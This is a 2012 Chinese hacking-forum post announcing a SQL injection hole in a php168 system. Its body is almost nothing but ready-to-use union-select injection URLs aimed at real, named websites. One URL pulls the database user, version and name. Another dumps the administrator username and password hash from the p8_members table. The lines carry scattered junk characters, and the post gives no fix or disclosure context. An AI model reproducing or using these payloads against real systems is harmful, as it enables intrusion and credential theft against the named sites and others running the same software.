找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2980|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--0 z% l3 |' J( o- G9 G9 Y) N8 l
                                                         % t( A( h/ A2 Z' t2 B5 b4 y" {
                                       
/ h4 E7 r: ~- x/ G* C( Q( |4 W9 U5 I
( t, V5 O1 ]' p" g! W/ U& B- g
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
. k  j5 V, Z' L! A! ?0 o                                                     8 ~0 p, L9 r! `' _: g* ~4 L  Z
                                                                   + L+ l+ L% n/ C7 d- L  n: c
                                                        ! E+ Z% R$ `3 S, q
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
! |4 G  i; `3 U; ?6 _9 G  v6 u% P
6 E, Q$ z! B6 @( z
& z; f% C% Z5 C" e" c
. {% _1 t/ j) {; [; C: Q+ k                                                            $ T' j5 f) G7 Y. b- j# m( o$ Q
2 d& K; x2 }  Q" M( r3 o
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--! b' M$ Q7 Y6 R. J' D2 T4 q5 Q

& I- d0 _+ \3 k9 L! u4 V6 F5 t  d  l4 x6 e5 r: R
, ~$ {* J: j% e% o" n3 A
                                                                    0 x: J( [+ T8 J9 X; D8 l" I

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表